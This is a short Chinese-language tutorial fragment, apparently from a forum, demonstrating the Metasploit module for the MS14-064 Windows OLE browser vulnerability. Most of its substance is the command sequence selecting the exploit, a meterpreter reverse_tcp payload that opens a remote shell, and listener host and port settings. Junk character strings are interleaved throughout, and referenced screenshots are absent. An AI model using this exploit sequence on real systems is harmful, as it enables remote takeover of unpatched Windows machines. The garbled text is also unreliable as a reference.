, @" g' t) R" A2 r! w+ ~
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示( Z' z1 z7 ?7 q. Z9 d/ |+ N0 H
* E" X: F! }; z
% w; G: V4 R) m5 Q; C" k& G
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
+ v7 i2 @5 A" D! L3 n5 i. G9 r
! w& K. u: y: e% z2 j0 S6 P; ~4 Y; `8 c: `9 W2 J# h# R; H, ?+ H
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp- x2 X, V/ B! T+ i& H# }$ C
, e F/ T8 z! H
( [. m4 c/ Y; t) G! r6 x) B
set AllowPowershellPrompt true9 W# q# W1 l3 K# W( p& Q
- x I6 P* B' r8 m: N, B
: X/ r6 x- }" p4 A. P
Set LHOST 192.168.0.109
. a3 y* T1 r3 ^3 K1 k. Y
3 c' Q9 `' C. Z: e* n3 {
. D2 Q) J# U' O5 q0 v. K/ [' G9 T8 L set SRVHOST 192.168.0.109, {* b' B' t% I/ S& C
2 D8 {" R9 Z1 d: x7 w6 R* r
6 a+ f7 Q; l+ o8 i& p9 \: g0 i Set uripath share) [+ Y+ o" Z* ^
& H8 }; N; X* A6 N& m3 }+ w$ M
: ]! l1 d: g& P) [5 ~ Set srvport 80
1 k( [# G5 J4 j6 i
: `8 q1 F" y7 }4 W. M8 J+ N& k( j
4 C# l& L" h F8 Z
4 t/ \3 x) G8 _! l$ _& r# y+ Q
! n K. d" A. p2 z* Z- t& B
/ c% |* v1 d9 j. U8 F
0 O- R5 R* a- t: q- F" H* }- Y
( z4 C( }6 i6 w0 I/ k" C9 r p) _
4 t6 ?7 P9 E6 E
& j# v$ N) V U7 @$ p. f2 E: P
; B+ S/ `% i. ~5 O" z. F0 c
g) }8 {8 q& O
5 b% K* d7 w* I
# o3 [% M" f0 U! Z8 k' }& S! a! R X$ q4 C
3 I& T( t0 n3 d5 ^. f8 L
% x* E- n2 P+ z& Q8 d
6 o I+ g4 K- @% Q4 ^' B 下面我们来访问本地地址如图:
5 T8 D/ o/ P7 X8 d' t8 s
0 e, l) M9 Q8 Q) V* p4 i, C. t1 g( j2 D) X: Y8 I
+ U8 ~! R% ^ r
0 Q2 _& H9 |0 Z# H6 J4 M* z& o( H4 ]( ~( L/ g, S7 C
' j0 E" a) g9 ^
4 ?* X$ z8 e8 `0 v
# v/ g- Z1 _: t; e, F
, e% @( a) F& h9 r' ^8 b7 t